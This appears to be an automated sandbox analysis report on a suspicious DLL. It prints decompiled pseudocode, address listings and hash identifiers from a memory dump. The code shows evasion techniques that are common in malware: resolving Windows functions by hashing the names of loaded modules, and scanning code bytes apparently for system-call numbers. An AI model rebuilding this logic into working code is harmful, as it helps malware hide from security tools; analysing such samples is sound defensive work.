							E1000F678( &(_t535[0x164]));
							E1000F5A8( &(_t535[0x48]), 0);
							_t535[0x18] = 0;
							E1000F5A8( &(_t535[0x20]), 0);
							_push(0xfe338407);
							_t289 = E10011D58(0xfe338407);
							_t290 = E10011310( &(_t535[0x154]), _t517, _t556);
							_push(_t290);
							_push(_t290);
							E10011C90( &(_t535[0x164]), 0xfe338407);
							_t518 =  &(_t535[0x178]);
							E1000D058( &(_t535[0x178]) - 0x24,  &(_t535[0x178]), _t535[0x15c]);
							_push(0x80);
							_push(0);
							E10015CAC( &(_t535[0x114]), _t556, _t535[0x184], 1);
							E10015CE0( &(_t535[0x180]) - 0x7c, _t556,  &(_t535[0x180]), 0);
							_push(_t289);
							E10018DE0( &(_t535[0xe4]),  &(_t535[0x180]), 2);
							E1000F678( &(_t535[0x180]));
							_t557 = _t535[0x114];
							if(_t535[0x114] != 0) {
								E1000BB88( &(_t535[0x110]));
							}
							E1000D020( &(_t535[0x104]));
							E1000D020(_t518);
							E1000D020( &(_t535[0x15c]));
							E1000D020( &(_t535[0x154]));
							E100190C4( &(_t535[0xdc]), 0xffffffff);
							_t535[0x118] = _t535[0xf0];
							E1000F63C( &(_t535[0x11c]), _t557,  &(_t535[0xf4]));
							_push(1);
							E10019088( &(_t535[0x11c]));
							_t381 = 0;
							_t535[0x64] = 0;
							_t535[0x60] = 0;
							do {
								_t535[0x58] = E1000F4E0( &(_t535[0x38]), _t535[0x60]);
								_t535[0x70] = E1000F4F0( &(_t535[0x44]));
								_t519 =  *(0x1001bd40 + _t381 * 4);
								_t531 = E10019054( &(_t535[0xf4]), _t519, _t519);
								if(_t531 == 0) {
									goto L42;
								}
								_t508 = E100187C0( &(_t535[0x11c]), _t519,  *_t531);
								_t532 =  *_t531;
								while(_t532 ==  *_t508) {
									_t508 = _t508 + 8;
									__eflags = _t508;
								}
								_t315 =  *_t508;
								_t535[0x74] = _t315;
								_t535[0x78] = _t315 - _t532;
								if(_t381 != 0) {
									L38:
									_t535[0x68] = E1000F4F0( &(_t535[0x44]));
									_t535[0x6c] = _t519;
									E1000F500( &(_t535[0x4c]), _t562, _t532, _t535[0x78]);
									_t319 = E1000F4F0( &(_t535[0x44]));
									_t487 = _t535[0x58];
									_t563 = _t319 -  *((intOrPtr*)(_t487 + 4));
									if(_t319 <=  *((intOrPtr*)(_t487 + 4))) {
										E1000F84C( &(_t535[0x20]), E1000F4F0( &(_t535[0x1c])) + 8);
										E1000F4E0( &(_t535[0x20]), E1000F4F0( &(_t535[0x1c])) + 0xfffffff8);
										asm("movsd");
										asm("movsd");
										_t535[0x18] = _t535[0x18] + 1;
										__eflags = _t381 - 0x1d;
										if(__eflags == 0) {
											_t228 =  &(_t535[0x44]); // 0x2c
											E10013154(_t535[0x58], _t228, __eflags,  &(_t535[0x18]));
										}
										goto L42;
									}
									E1000F84C( &(_t535[0x48]), _t535[0x70]);
									E10013154(_t535[0x58],  &(_t535[0x44]), _t563,  &(_t535[0x18]));
									E1000F864( &(_t535[0x44]), _t563);
									E1000F864( &(_t535[0x1c]), _t563);
									_t381 = _t381 - 1;
									_t334 = _t535[0x64] + 1;
									_t535[0x60] = _t535[0x60] + 0x14;
									_t535[0x18] = 0;
									_t535[0x64] = _t334;
									if(_t334 == _t535[0x30]) {
										break;
									}
									goto L42;
								}
								E10019114( &(_t535[0x134]), _t519);
								_t535[0x5c] = _t532;
								while(1) {
									_t336 = _t535[0x5c];
									_t562 =  *_t336 - 0xb8;
									if( *_t336 == 0xb8) {
										break;
									}
									_t490 = _t535[0x5c] + E100190DC( &(_t535[0x138]), __eflags, _t535[0x74]);
									_t535[0x5c] = _t490;
									__eflags = _t490 -  *_t508;
									if(__eflags < 0) {
										continue;
									}
									L37:
									E1000F678( &(_t535[0x144]));
									E1000F678( &(_t535[0x134]));
									goto L38;
								}
								 *0x1001d2e8 =  *((intOrPtr*)(_t336 + 1));
								goto L37;
								L42:
								_t381 = _t381 + 1;
							} while (_t381 < 0x1e);
							E1000F678( &(_t535[0x11c]));
							E10018E40(_t381,  &(_t535[0xd8]));
							E1000F678( &(_t535[0x1c]));
							E1000F678( &(_t535[0x44]));
							E1000F678( &(_t535[0x34]));
							goto L44;
						}
						_t533 = 0;
						_t382 = 0;
						do {
							_t341 = E1000F4E0( &(_t535[0xc]), _t382);
							_t517 = _t341;
							E1000F84C( &(_t535[0x38]), E1000F4F0( &(_t535[0x34])) + 0x14);
							_t347 = E1000F4E0( &(_t535[0x38]), E1000F4F0( &(_t535[0x34])) + 0xffffffec);
							_t451 = 5;
							memcpy(_t347, _t341, _t451 << 2);
							_t535 =  &(_t535[0xc]);
							_t533 = _t533 + 1;
							_t382 = _t382 + 0x14;
							_t535[0x30] = _t535[0x30] + 1;
						} while (_t533 < _t535[0x44]);
						goto L24;
					}
					_t535[0x4c] = 1;
					_t534 = 0x14;
					do {
						_t62 = _t534 - 0x14; // 0x0
						_t383 = E1000F4E0( &(_t535[0xc]), _t62);
						_t455 = E1000F4E0( &(_t535[0xc]), _t534);
						_t517 =  *_t383;
						_t352 =  *_t455;
						if(_t352 >= _t517 && _t352 <= _t383[1] + _t517) {
							_t383[1] =  *((intOrPtr*)(_t455 + 0x10)) - _t517;
						}
						_t534 = _t534 + 0x14;
						_t354 = _t535[0x4c] + 1;
						_t535[0x4c] = _t354;
					} while (_t354 < _t535[0x44]);
					_t535[0x44] = _t535[4];
					goto L21;
				}
			}








































































                                                                                                        0x1001146c
                                                                                                        0x10011473
                                                                                                        0x10011476
                                                                                                        0x1001147d
                                                                                                        0x10011bff
                                                                                                        0x10011bff
                                                                                                        0x10011483
                                                                                                        0x1001148e
                                                                                                        0x100119cd
                                                                                                        0x100119d1
                                                                                                        0x00000000
                                                                                                        0x10011c50
                                                                                                        0x100119d7
                                                                                                        0x100119da
                                                                                                        0x100119dd
                                                                                                        0x100119e7
                                                                                                        0x100119f6
                                                                                                        0x100119f8
                                                                                                        0x100119ff
                                                                                                        0x10011be9
                                                                                                        0x10011beb
                                                                                                        0x10011bee
                                                                                                        0x10011bf2
                                                                                                        0x00000000
                                                                                                        0x10011bf2
                                                                                                        0x10011a0e
                                                                                                        0x10011a19
                                                                                                        0x10011a20
                                                                                                        0x10011a23
                                                                                                        0x10011a25
                                                                                                        0x10011a28
                                                                                                        0x10011a2b
                                                                                                        0x10011a31
                                                                                                        0x10011a3f
                                                                                                        0x10011a4f
                                                                                                        0x10011a74
                                                                                                        0x10011a85
                                                                                                        0x10011a88
                                                                                                        0x10011a8a
                                                                                                        0x10011aee
                                                                                                        0x10011af1
                                                                                                        0x10011af1
                                                                                                        0x10011af3
                                                                                                        0x10011af6
                                                                                                        0x10011afa
                                                                                                        0x10011afa
                                                                                                        0x10011afe
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10011b0b
                                                                                                        0x10011b11
                                                                                                        0x10011b45
                                                                                                        0x10011b4b
                                                                                                        0x10011b4d
                                                                                                        0x10011c1c
                                                                                                        0x10011c24
                                                                                                        0x10011c27
                                                                                                        0x10011c29
                                                                                                        0x10011c40
                                                                                                        0x10011c40
                                                                                                        0x10011c2b
                                                                                                        0x10011c2f
                                                                                                        0x10011c34
                                                                                                        0x10011c34
                                                                                                        0x10011c42
                                                                                                        0x10011c48
                                                                                                        0x10011b67
                                                                                                        0x10011b67
                                                                                                        0x10011b69
                                                                                                        0x10011b69
                                                                                                        0x10011b6b
                                                                                                        0x10011b6b
                                                                                                        0x10011b70
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10011b72
                                                                                                        0x10011b73
                                                                                                        0x10011b76
                                                                                                        0x10011b79
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10011b85
                                                                                                        0x10011b88
                                                                                                        0x10011b8a
                                                                                                        0x10011ba1
                                                                                                        0x10011ba1
                                                                                                        0x10011b8c
                                                                                                        0x10011b90
                                                                                                        0x10011b95
                                                                                                        0x10011b95
                                                                                                        0x10011bae
                                                                                                        0x10011bb1
                                                                                                        0x10011bba
                                                                                                        0x10011bbd
                                                                                                        0x10011be0
                                                                                                        0x10011be4
                                                                                                        0x00000000
                                                                                                        0x10011be4
                                                                                                        0x10011bc5
                                                                                                        0x10011bc5
                                                                                                        0x10011bd1
                                                                                                        0x10011bd4
                                                                                                        0x10011bdd
                                                                                                        0x00000000
                                                                                                        0x10011bdd
                                                                                                        0x10011b53
                                                                                                        0x10011b63
                                                                                                        0x10011b63
                                                                                                        0x10011b65
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10011b5b
                                                                                                        0x10011b5d
                                                                                                        0x10011b5d
                                                                                                        0x00000000
                                                                                                        0x10011b63
                                                                                                        0x10011b13
                                                                                                        0x10011b1b
                                                                                                        0x10011b3b
                                                                                                        0x10011b1d
                                                                                                        0x10011b1d
                                                                                                        0x10011b25
                                                                                                        0x10011b2e
                                                                                                        0x10011b2e
                                                                                                        0x10011b25
                                                                                                        0x00000000
                                                                                                        0x10011b1b
                                                                                                        0x10011a8c
                                                                                                        0x10011a93
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10011aa0
                                                                                                        0x10011aa6
                                                                                                        0x10011aab
                                                                                                        0x10011ab2
                                                                                                        0x10011ab6
                                                                                                        0x10011acb
                                                                                                        0x10011acd
                                                                                                        0x10011acf
                                                                                                        0x10011ad5
                                                                                                        0x10011ae3
                                                                                                        0x10011ae3
                                                                                                        0x10011ae9
                                                                                                        0x00000000
                                                                                                        0x10011ae9
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10011a33
                                                                                                        0x10011a33
                                                                                                        0x10011a33
                                                                                                        0x10011a34
                                                                                                        0x10011a37
                                                                                                        0x10011a3b
                                                                                                        0x00000000
                                                                                                        0x10011a51
                                                                                                        0x10011a54
                                                                                                        0x10011a57
                                                                                                        0x10011a60
                                                                                                        0x10011a63
                                                                                                        0x10011a64
                                                                                                        0x10011a66
                                                                                                        0x00000000
                                                                                                        0x100114a1
                                                                                                        0x100114a3
                                                                                                        0x100114a8
                                                                                                        0x100114b3
                                                                                                        0x100114c1
                                                                                                        0x100114d4
                                                                                                        0x100114e1
                                                                                                        0x100114ea
                                                                                                        0x100114ee
                                                                                                        0x100114f2
                                                                                                        0x1001153a
                                                                                                        0x1001153a
                                                                                                        0x1001153c
                                                                                                        0x10011543
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001155c
                                                                                                        0x10011564
                                                                                                        0x10011568
                                                                                                        0x1001157d
                                                                                                        0x10011581
                                                                                                        0x10011585
                                                                                                        0x1001158e
                                                                                                        0x10011594
                                                                                                        0x10011597
                                                                                                        0x1001159b
                                                                                                        0x100115a3
                                                                                                        0x100115a5
                                                                                                        0x100115a9
                                                                                                        0x100115b0
                                                                                                        0x100115b9
                                                                                                        0x100115b9
                                                                                                        0x100115bd
                                                                                                        0x100115d2
                                                                                                        0x100115e8
                                                                                                        0x100115f5
                                                                                                        0x100115f6
                                                                                                        0x100115f6
                                                                                                        0x100115f8
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100115b2
                                                                                                        0x100115b2
                                                                                                        0x100115b2
                                                                                                        0x100115b3
                                                                                                        0x100115b4
                                                                                                        0x00000000
                                                                                                        0x100115b2
                                                                                                        0x10011577
                                                                                                        0x1001157b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100115fc
                                                                                                        0x100115fc
                                                                                                        0x100115fd
                                                                                                        0x10011600
                                                                                                        0x1001160a
                                                                                                        0x1001160a
                                                                                                        0x1001160e
                                                                                                        0x10011615
                                                                                                        0x10011670
                                                                                                        0x10011675
                                                                                                        0x100116c8
                                                                                                        0x100116c8
                                                                                                        0x100116cc
                                                                                                        0x100116d0
                                                                                                        0x100114fa
                                                                                                        0x100114fd
                                                                                                        0x10011502
                                                                                                        0x10011508
                                                                                                        0x1001150b
                                                                                                        0x10011512
                                                                                                        0x10011516
                                                                                                        0x1001151d
                                                                                                        0x10011526
                                                                                                        0x1001152a
                                                                                                        0x1001152e
                                                                                                        0x10011534
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10011534
                                                                                                        0x100116da
                                                                                                        0x100116e6
                                                                                                        0x100116f1
                                                                                                        0x100116f8
                                                                                                        0x10011701
                                                                                                        0x1001170b
                                                                                                        0x1001170c
                                                                                                        0x1001171a
                                                                                                        0x1001171f
                                                                                                        0x10011720
                                                                                                        0x1001172d
                                                                                                        0x10011732
                                                                                                        0x10011744
                                                                                                        0x10011749
                                                                                                        0x1001174e
                                                                                                        0x10011760
                                                                                                        0x10011772
                                                                                                        0x10011777
                                                                                                        0x10011782
                                                                                                        0x10011789
                                                                                                        0x1001178e
                                                                                                        0x10011796
                                                                                                        0x1001179f
                                                                                                        0x1001179f
                                                                                                        0x100117ab
                                                                                                        0x100117b2
                                                                                                        0x100117be
                                                                                                        0x100117ca
                                                                                                        0x100117d8
                                                                                                        0x100117e9
                                                                                                        0x100117f0
                                                                                                        0x100117f5
                                                                                                        0x100117fe
                                                                                                        0x10011803
                                                                                                        0x10011805
                                                                                                        0x10011809
                                                                                                        0x1001180d
                                                                                                        0x1001181a
                                                                                                        0x10011827
                                                                                                        0x1001182b
                                                                                                        0x1001183f
                                                                                                        0x10011843
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10011858
                                                                                                        0x1001185a
                                                                                                        0x10011862
                                                                                                        0x1001185f
                                                                                                        0x1001185f
                                                                                                        0x1001185f
                                                                                                        0x10011866
                                                                                                        0x10011868
                                                                                                        0x1001186e
                                                                                                        0x10011874
                                                                                                        0x100118d0
                                                                                                        0x100118d9
                                                                                                        0x100118dd
                                                                                                        0x100118ea
                                                                                                        0x100118f3
                                                                                                        0x100118f8
                                                                                                        0x100118fc
                                                                                                        0x100118ff
                                                                                                        0x10011960
                                                                                                        0x10011976
                                                                                                        0x10011981
                                                                                                        0x10011982
                                                                                                        0x10011983
                                                                                                        0x10011987
                                                                                                        0x1001198a
                                                                                                        0x10011c0a
                                                                                                        0x10011c0d
                                                                                                        0x10011c0d
                                                                                                        0x00000000
                                                                                                        0x1001198a
                                                                                                        0x10011909
                                                                                                        0x10011919
                                                                                                        0x10011922
                                                                                                        0x1001192b
                                                                                                        0x10011934
                                                                                                        0x10011935
                                                                                                        0x10011936
                                                                                                        0x1001193b
                                                                                                        0x10011943
                                                                                                        0x1001194b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001194d
                                                                                                        0x1001187d
                                                                                                        0x10011882
                                                                                                        0x10011886
                                                                                                        0x10011886
                                                                                                        0x1001188a
                                                                                                        0x1001188d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100118ae
                                                                                                        0x100118b0
                                                                                                        0x100118b4
                                                                                                        0x100118b6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100118b8
                                                                                                        0x100118bf
                                                                                                        0x100118cb
                                                                                                        0x00000000
                                                                                                        0x100118cb
                                                                                                        0x10011892
                                                                                                        0x00000000
                                                                                                        0x10011990
                                                                                                        0x10011990
                                                                                                        0x10011991
                                                                                                        0x100119a1
                                                                                                        0x100119ad
                                                                                                        0x100119b6
                                                                                                        0x100119bf
                                                                                                        0x100119c8
                                                                                                        0x00000000
                                                                                                        0x100119c8
                                                                                                        0x10011677
                                                                                                        0x10011679
                                                                                                        0x1001167b
                                                                                                        0x10011680
                                                                                                        0x10011685
                                                                                                        0x10011698
                                                                                                        0x100116ae
                                                                                                        0x100116b7
                                                                                                        0x100116b8
                                                                                                        0x100116b8
                                                                                                        0x100116ba
                                                                                                        0x100116bb
                                                                                                        0x100116be
                                                                                                        0x100116c2
                                                                                                        0x00000000
                                                                                                        0x1001167b
                                                                                                        0x10011617
                                                                                                        0x10011621
                                                                                                        0x10011622
                                                                                                        0x10011622
                                                                                                        0x1001162f
                                                                                                        0x1001163b
                                                                                                        0x1001163d
                                                                                                        0x1001163f
                                                                                                        0x10011643
                                                                                                        0x10011653
                                                                                                        0x10011653
                                                                                                        0x1001165a
                                                                                                        0x1001165d
                                                                                                        0x1001165e
                                                                                                        0x10011662
                                                                                                        0x1001166c
                                                                                                        0x00000000
                                                                                                        0x1001166c

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.599608439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.599564255.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.599779565.000000001001A000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.599845598.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.599864111.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 6bb1c58a8491a04b1b7cf55d076a4f7d4491392b2eab6815a4a95e8e134fd5d3
                                                                                                        • Instruction ID: b1410cd0d196bac93b6c766087412172e782a524cb2907c5cacc11c56020be0d
                                                                                                        • Opcode Fuzzy Hash: 6bb1c58a8491a04b1b7cf55d076a4f7d4491392b2eab6815a4a95e8e134fd5d3
                                                                                                        • Instruction Fuzzy Hash: 99327C745083418FD718DF28C881AAFB7E5FF94384F10892DF5958B2A6EB70E985CB52
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 10011D58, Relevance: .3, Instructions: 282COMMONCrypto
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 89%
                                                                                                        			E10011D58(intOrPtr __eax) {
				void* _t72;
				intOrPtr _t74;
				signed int _t75;
				signed int _t76;
				signed char _t84;
				signed char _t86;
				signed char _t89;
				signed char _t92;
				signed char _t95;
				signed char* _t99;
				void* _t113;
				signed char _t114;
				signed char _t116;
				signed char _t118;
				intOrPtr _t119;
				signed char _t120;
				signed char _t127;
				signed char _t129;
				signed char _t130;
				signed char _t143;
				signed char _t145;
				signed char _t146;
				signed int _t147;
				signed char _t148;
				void* _t151;
				signed char _t155;
				signed char _t159;
				signed char _t165;
				signed char _t166;
				signed char _t167;
				signed char _t168;
				void* _t170;
				void* _t171;
				intOrPtr _t172;
				signed char _t173;
				intOrPtr _t174;
				intOrPtr* _t175;
				signed char _t176;
				signed char _t177;
				signed char _t178;
				signed char _t179;
				signed char* _t181;

				_t119 = __eax;
				_t143 =  *0x1001d21c; // 0x76470dcb
				if(_t143 == 0x76470dcb) {
					_t143 = 0;
					 *0x1001d21c = 0;
				}
				if(_t119 != 0xfe338407) {
					L4:
					_t174 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
					if(_t119 != 0xa7e21d79) {
						while(1) {
							L10:
							__eflags = _t143;
							if(_t143 == 0) {
								break;
							}
							_t72 = 0;
							_t120 = 0;
							__eflags = 0;
							while(1) {
								__eflags = _t119 -  *((intOrPtr*)(_t120 + _t143 + 8));
								if(_t119 ==  *((intOrPtr*)(_t120 + _t143 + 8))) {
									break;
								}
								_t72 = _t72 + 1;
								_t120 = _t120 + 0x10;
								__eflags = _t72 - 0x10;
								if(_t72 < 0x10) {
									continue;
								}
								_t143 =  *(_t143 + 0x100);
								goto L10;
							}
							return  *((intOrPtr*)(_t120 + _t143 + 0xc));
						}
						__eflags = _t119 - 0x94e21d79;
						if(_t119 != 0x94e21d79) {
							_t74 =  *((intOrPtr*)(_t174 + 0xc));
							_t175 =  *((intOrPtr*)(_t74 + 0xc));
							_t181[4] =  *(_t74 + 0x10);
							while(1) {
								_t172 =  *((intOrPtr*)(_t175 + 0x30));
								_t75 = 0;
								__eflags = 0;
								while(1) {
									_t145 =  *(_t172 + _t75 * 2) & 0x0000ffff;
									_t181[0x1c + _t75 * 2] = _t145;
									__eflags = _t145;
									_t146 =  *(_t175 + 0x2c) & 0x0000ffff;
									if(_t145 == 0) {
										break;
									}
									_t75 = _t75 + 1;
									__eflags = _t75 - _t146;
									if(_t75 <= _t146) {
										continue;
									}
									break;
								}
								__eflags = _t146;
								_t147 = 0;
								if(_t146 <= 0) {
									L34:
									_t76 = E10014FD4( &(_t181[0x13c]), _t147);
									__eflags = _t119 - (_t76 ^ 0x7af3da47);
									if(_t119 == (_t76 ^ 0x7af3da47)) {
										_t173 =  *(_t175 + 0x18);
										__eflags = _t173;
										if(_t173 == 0) {
											L55:
											return _t173;
										}
										L38:
										_t148 =  *0x1001d2ec; // 0x0
										__eflags = _t148 |  *0x1001d2ed;
										if((_t148 |  *0x1001d2ed) == 0) {
											_t176 =  *0x1001d21c; // 0x76470dcb
											__eflags = _t176;
											if(_t176 == 0) {
												 *0x1001d2ec = 1;
												_t177 = E100135F4(0x104);
												__eflags = _t177;
												if(_t177 == 0) {
													_t177 = 0;
													__eflags = 0;
													L62:
													 *0x1001d21c = _t177;
													 *0x1001d214 = E10013044(0xfe338407, 0xb0386671, 0xfe338407, 0xfe338407);
													 *0x1001d2ec = 0;
													L45:
													_t151 = 0;
													_t165 = 0;
													__eflags = 0;
													while(1) {
														__eflags =  *(_t165 + _t177 + 8);
														if( *(_t165 + _t177 + 8) == 0) {
															break;
														}
														_t151 = _t151 + 1;
														_t165 = _t165 + 0x10;
														__eflags = _t151 - 0x10;
														if(_t151 < 0x10) {
															continue;
														}
														_t84 = E100135F4(0x104);
														_t181[4] = _t84;
														__eflags =  *_t181;
														if( *_t181 == 0) {
															 *_t181 = 0;
															L53:
															 *( *_t181 + 0xc) = _t173;
															E1000D03C( *_t181,  &(_t181[0x1c]));
															_t155 =  *_t181;
															 *((intOrPtr*)(_t155 + 8)) = _t119;
															 *(_t177 + 0x100) = _t155;
															goto L55;
														}
														_t167 = _t84;
														_t86 = 0x10;
														do {
															_t181[0x13c] = _t86;
															E1000CFC8(_t167, 0);
															 *((intOrPtr*)(_t167 + 8)) = 0;
															 *((intOrPtr*)(_t167 + 0xc)) = 0;
															_t167 = _t167 + 0x10;
															_t86 = _t181[0x138] - 1;
															__eflags = _t86;
														} while (_t86 != 0);
														 *( *_t181 + 0x100) = 0;
														goto L53;
													}
													_t166 = _t165 + _t177;
													__eflags = _t166;
													 *(_t166 + 0xc) = _t173;
													E1000D03C(_t166,  &(_t181[0x1c]));
													 *((intOrPtr*)(_t166 + 8)) = _t119;
													goto L55;
												}
												_t168 = _t177;
												_t89 = 0x10;
												do {
													_t181[4] = _t89;
													E1000CFC8(_t168, 0);
													 *((intOrPtr*)(_t168 + 8)) = 0;
													 *((intOrPtr*)(_t168 + 0xc)) = 0;
													_t168 = _t168 + 0x10;
													_t89 =  *_t181 - 1;
													__eflags = _t89;
												} while (_t89 != 0);
												 *(_t177 + 0x100) = 0;
												goto L62;
											}
											_t159 =  *(_t176 + 0x100);
											while(1) {
												__eflags = _t159;
												if(_t159 == 0) {
													goto L45;
												}
												_t177 = _t159;
												_t159 =  *(_t159 + 0x100);
											}
											goto L45;
										}
										__eflags = _t119 - 0xfe338407;
										if(_t119 == 0xfe338407) {
											 *0x1001d220 = _t173;
										}
										goto L55;
									}
									__eflags = _t175 - _t181[4];
									if(_t175 != _t181[4]) {
										_t175 =  *_t175;
										continue;
									}
									L36:
									_t173 = 0;
									goto L55;
								}
								_t92 = 0;
								__eflags = 0;
								while(1) {
									_t126 =  *((char*)(_t172 + _t147 * 2));
									 *_t181 = _t92;
									_t39 = _t126 - 0x41; // -81
									__eflags = _t39 - 0x19;
									_t40 = _t126 + 0x20; // 0x10
									_t127 =  <=  ? _t40 :  *((char*)(_t172 + _t147 * 2));
									_t181[_t147 + 0x13c] = _t127;
									_t95 =  *_t181;
									__eflags = _t127;
									if(_t127 == 0) {
										goto L34;
									}
									_t92 = _t95 + 1;
									_t147 = _t147 + 1;
									__eflags = _t92 - ( *(_t175 + 0x2c) & 0x0000ffff);
									if(_t92 < ( *(_t175 + 0x2c) & 0x0000ffff)) {
										continue;
									}
									goto L34;
								}
								goto L34;
							}
						}
						_t170 = E10019A00();
						_t178 = 0;
						while(1) {
							_t129 = E10013044(0xfe338407, 0x790529cb, 0xfe338407, 0xfe338407);
							__eflags = _t129;
							if(_t129 == 0) {
								goto L16;
							}
							_t116 =  *_t129(0xffffffff, _t178, 0,  &(_t181[0x11c]), 0x1c, 0);
							__eflags = _t116;
							if(_t116 != 0) {
								goto L36;
							}
							L16:
							_t99 =  &(_t181[0x120]);
							_t173 =  *_t99;
							_t130 = _t99[8];
							__eflags = _t173 - _t170;
							if(_t173 > _t170) {
								L13:
								_t178 = _t178 + _t130;
								__eflags = _t178;
								continue;
							}
							__eflags = _t130 + _t173 - _t170;
							if(_t130 + _t173 <= _t170) {
								goto L13;
							}
							__eflags = _t173;
							if(_t173 == 0) {
								goto L55;
							}
							E1000F5A8( &(_t181[0x10]), 0x400);
							_t171 = E1000F4E0( &(_t181[0x10]), 0);
							_t179 = E10013044(0xfe338407, 0x790529cb, 0xfe338407, 0xfe338407);
							__eflags = _t179;
							if(_t179 == 0) {
								L21:
								E1000D000( &(_t181[0xc]),  *((intOrPtr*)(_t171 + 4)), 0);
								__eflags = E1000D210( &(_t181[8]), 0x5c);
								if(__eflags != 0) {
									_push(0x5c);
									E1000D650( &(_t181[0xc]), __eflags,  &(_t181[0x1bc]));
									E1000D03C( &(_t181[8]), _t181[0x1bc]);
									E1000D020( &(_t181[0x1bc]));
								}
								E1000DE70( &(_t181[0x20]), _t181[4], 0);
								E1000D020( &(_t181[4]));
								L24:
								E1000F678( &(_t181[0xc]));
								goto L38;
							}
							 *_t181 = E1000F4E0( &(_t181[0x10]), 0);
							_t113 = E1000F4F0( &(_t181[0xc]));
							_t114 =  *_t179(0xffffffff, _t173, 2, _t181[8], _t113, 0);
							__eflags = _t114;
							if(_t114 != 0) {
								goto L24;
							}
							goto L21;
						}
					}
					return  *((intOrPtr*)(_t174 + 8));
				} else {
					_t118 =  *0x1001d220; // 0xe86b6198
					if(_t118 != 0xe86b6198) {
						return _t118;
					}
					goto L4;
				}
			}













































                                                                                                        0x10011d62
                                                                                                        0x10011d64
                                                                                                        0x10011d70
                                                                                                        0x10011d72
                                                                                                        0x10011d74
                                                                                                        0x10011d74
                                                                                                        0x10011d80
                                                                                                        0x10011d92
                                                                                                        0x10011d98
                                                                                                        0x10011da1
                                                                                                        0x10011dc8
                                                                                                        0x10011dc8
                                                                                                        0x10011dc8
                                                                                                        0x10011dca
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10011dab
                                                                                                        0x10011dad
                                                                                                        0x10011dad
                                                                                                        0x10011daf
                                                                                                        0x10011daf
                                                                                                        0x10011db3
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10011db9
                                                                                                        0x10011dba
                                                                                                        0x10011dbd
                                                                                                        0x10011dc0
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10011dc2
                                                                                                        0x00000000
                                                                                                        0x10011dc2
                                                                                                        0x00000000
                                                                                                        0x100120f1
                                                                                                        0x10011dcc
                                                                                                        0x10011dd2
                                                                                                        0x10011efe
                                                                                                        0x10011f04
                                                                                                        0x10011f07
                                                                                                        0x10011f10
                                                                                                        0x10011f10
                                                                                                        0x10011f13
                                                                                                        0x10011f13
                                                                                                        0x10011f15
                                                                                                        0x10011f15
                                                                                                        0x10011f19
                                                                                                        0x10011f1e
                                                                                                        0x10011f20
                                                                                                        0x10011f24
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10011f26
                                                                                                        0x10011f27
                                                                                                        0x10011f29
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10011f29
                                                                                                        0x10011f2b
                                                                                                        0x10011f2f
                                                                                                        0x10011f30
                                                                                                        0x10011f62
                                                                                                        0x10011f69
                                                                                                        0x10011f73
                                                                                                        0x10011f75
                                                                                                        0x10011f84
                                                                                                        0x10011f87
                                                                                                        0x10011f89
                                                                                                        0x10012071
                                                                                                        0x00000000
                                                                                                        0x10012071
                                                                                                        0x10011f8f
                                                                                                        0x10011f8f
                                                                                                        0x10011f95
                                                                                                        0x10011f9b
                                                                                                        0x10011fb4
                                                                                                        0x10011fba
                                                                                                        0x10011fbc
                                                                                                        0x10012085
                                                                                                        0x10012091
                                                                                                        0x10012094
                                                                                                        0x10012096
                                                                                                        0x100120c7
                                                                                                        0x100120c7
                                                                                                        0x100120c9
                                                                                                        0x100120d5
                                                                                                        0x100120e0
                                                                                                        0x100120e5
                                                                                                        0x10011fd6
                                                                                                        0x10011fd6
                                                                                                        0x10011fd8
                                                                                                        0x10011fd8
                                                                                                        0x10011fda
                                                                                                        0x10011fda
                                                                                                        0x10011fdf
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10011fe1
                                                                                                        0x10011fe2
                                                                                                        0x10011fe5
                                                                                                        0x10011fe8
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10011fef
                                                                                                        0x10011ff4
                                                                                                        0x10011ff9
                                                                                                        0x10011ffd
                                                                                                        0x10012038
                                                                                                        0x1001203f
                                                                                                        0x10012047
                                                                                                        0x1001204a
                                                                                                        0x1001204f
                                                                                                        0x10012052
                                                                                                        0x10012055
                                                                                                        0x00000000
                                                                                                        0x10012055
                                                                                                        0x10011fff
                                                                                                        0x10012003
                                                                                                        0x10012004
                                                                                                        0x10012008
                                                                                                        0x1001200f
                                                                                                        0x1001201d
                                                                                                        0x10012020
                                                                                                        0x10012023
                                                                                                        0x10012026
